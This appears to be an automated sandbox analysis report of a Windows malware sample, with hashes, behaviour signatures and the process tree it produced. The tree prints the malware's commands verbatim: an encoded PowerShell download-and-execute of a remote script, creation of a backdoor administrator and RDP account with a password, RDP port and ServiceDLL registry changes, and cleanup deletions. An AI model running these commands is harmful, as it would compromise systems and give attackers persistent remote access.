Analysis
-
max time kernel
79s -
max time network
122s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
06-04-2021 15:26
General
-
Target
1e9f45329ffece31382bb884367f58df.exe
-
Size
6.0MB
-
MD5
1e9f45329ffece31382bb884367f58df
-
SHA1
52d3d55364d8c4d350231d38bfe6eb156cf8473f
-
SHA256
8779c8ac97c45254bc243e2ee79b436d1a96bc56885dcaa72c4837790b2071fc
-
SHA512
12272d5f20c42764992420aa1a178b16d7ef1873f2c9619bd8ac16e0eb9a0067a08a9d70863c1d3e95dd4a2aa19c081ae0baabaf3431f5068ea7191c8f4d6c62
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Loads dropped DLL 2 IoCs
-
Drops file in Program Files directory 4 IoCs
-
Drops file in Windows directory 19 IoCs
-
Delays execution with timeout.exe 1 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 18 IoCs
-
Suspicious behavior: LoadsDriver 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\1e9f45329ffece31382bb884367f58df.exe"C:\Users\Admin\AppData\Local\Temp\1e9f45329ffece31382bb884367f58df.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\g0l1vtu2\g0l1vtu2.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBC51.tmp" "c:\Users\Admin\AppData\Local\Temp\g0l1vtu2\CSCB2B44974A09B4C2AAD7F22AFD19B374.TMP"4⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C timeout -n t& del C:\Users\Admin\AppData\Local\Temp\1e9f45329ffece31382bb884367f58df.exe2⤵
-
C:\Windows\system32\timeout.exetimeout -n t3⤵
- Delays execution with timeout.exe
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc KhHboRk1 /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc KhHboRk1 /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc KhHboRk1 /add3⤵
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD3⤵
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc KhHboRk11⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc KhHboRk12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc KhHboRk13⤵
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
57c548b15fb26ecf9053a5adc58db9f2
SHA1c9f15dbef109de66634ddd66d205aa8a13d90428
SHA25684a3d6308c04697e1b736ba62d3f9cc8b94c0183714f67cf027c6681dfad47bb
SHA512eb99e2574128f8f6c1e6cafff310c379c8e0a8968293038bebe68ec1864b83f01bc9b72314699ea9ecf49054103ca05d6de80201519047424a1f0b865365f10a
-
MD5
22739b4511ffda27ba5a43947b21a609
SHA1079c2f0c6dfe5fc173f40811ff23d99be467c3f0
SHA2562862f6c21367deba0f2be76bb46b4271ad1f44a843876b27738893ce58961cf2
SHA5123918293d55cc260288394312615cbbbba028c8d2a3706e243d4a3f46dbcad27b2f6629a7ca34b161cec86d4fa55c240d87c0ce5db3f63043099265fffda5b42f
-
MD5
c443cf6ae10a8a6234844083270313d0
SHA1f75c49b5b213ad54b21b5e135c8a39996f1d6dfc
SHA256328ad5a5c3548402b693a69d731c8976538efef069f128083055f999c9ee4715
SHA5129e75ee1438933cd4cfd0633c81d3c5983b426a32666172c7b13a8f8c598acf2e941a015271c3fbbb2bc4c83ac3c0aae92a7fe6e6ab9283efb4b1c588c79b5b07
-
MD5
37330f50cf392bca59567a22de3b836a
SHA1f7b37328533a133567aa28f03015da69e2e36547
SHA256a34c2923388f87e84a4f67f123626af4eff5e7d7e5abe327b6a1b1aa55a12de1
SHA5125d1c19df182caf82388fd05e30422fa957af30a4092334a53a128e36d6c3ce2cb20aa10d96344cd8b1b145180df4d737b30bbd48a1c809ce25a82912397b19a6
-
MD5
67dd3480acda1eb6e0cfbb4fdd7d3ff5
SHA1c470116790dca927c7e00b6de597922758a7e184
SHA2561ec5fe169e1239359c2bdc08af5913e966c79d31b112d09f97f971a285807742
SHA512ab0b6faf3e1875d86fdd321141ad5b45d494de60feec645b2fcc43f13c602feae799adcd43148d389a4f514dfa98a7b11f62c2e9c6a9e1b46c25e49b0f9d1aa5
-
MD5
fdff1f264c5f5570a5393659b154cb88
SHA1de254de5e517074a9986b36fec83f921aa9aa497
SHA256ff936e8436684fa709bed64fea9021468fd0c744a4e3412b3ef86e642d6c3769
SHA512db434d37d6e5acb096c26abe7f07744a1a1379179f013810df3f95e41e2b7f55dfe7dc65d053a3d0c6401bc13c7dd99e940073fbe741237966620761c3b9e35a
-
MD5
b301617e9f67c3eda9b02cce3343b08b
SHA1b0207afa7574097b479bf464df834559a53c703b
SHA256f2fb172042c62da704b1afe0bc8e1462ca2d9ba990b17232eebaa4d03d200ef0
SHA5120d1c35908d7e35d29acd43b2a2efba007941c8126ffd085abbd20f321bf75d98b8d83677c7ade5b3589125786b6f1a5afbd3e0dde392a9062c3a108df4b36451
-
MD5
ddc17bc082038ee52b30808daf87f090
SHA1f862491e1195e039e05bd241856a9015846b3096
SHA256a04583453340fa979e7efae6022c531ef06e175c388a15214bd6d32a67f1e627
SHA5126f5edb94f56ec7e70199bfce671f20b111b102a017ba48ff7b391b09bb7485d3a7be9c2bdc2fa587b463a2874c795992db4a5dd824a4d7a4c0fdeb41ff3a9370
-
MD5
072548125d601f1048b4cb73682cbb7b
SHA15d3582747ad69cff9db5aa45b20816a7c2218cf0
SHA256e4453d95ba2fa4de68fa324a1dc8e59028969d86ea5b5a8b08a1bc33bce40582
SHA512b54f5fcf9d153a61c82dc698d7dc7314720fda304e013ad8dc04fc277e6ff905a049f945f2adcc61df7b4853d38d92da026b7836f6aa52a331a4cba9a56184fb
-
-
-
-
Filesize
8KB
-
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
9.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
9.9MB
-
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
9.9MB
-
Filesize
8KB
-
Filesize
6.4MB
-
Filesize
4.1MB
-
Filesize
8KB
-
-
-
-
-
-
-
-
Filesize
4KB
-
Filesize
9.9MB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
-
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
9.9MB
-
Filesize
8KB
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
9.9MB
-
-
Filesize
8KB
-
-
-
-
-
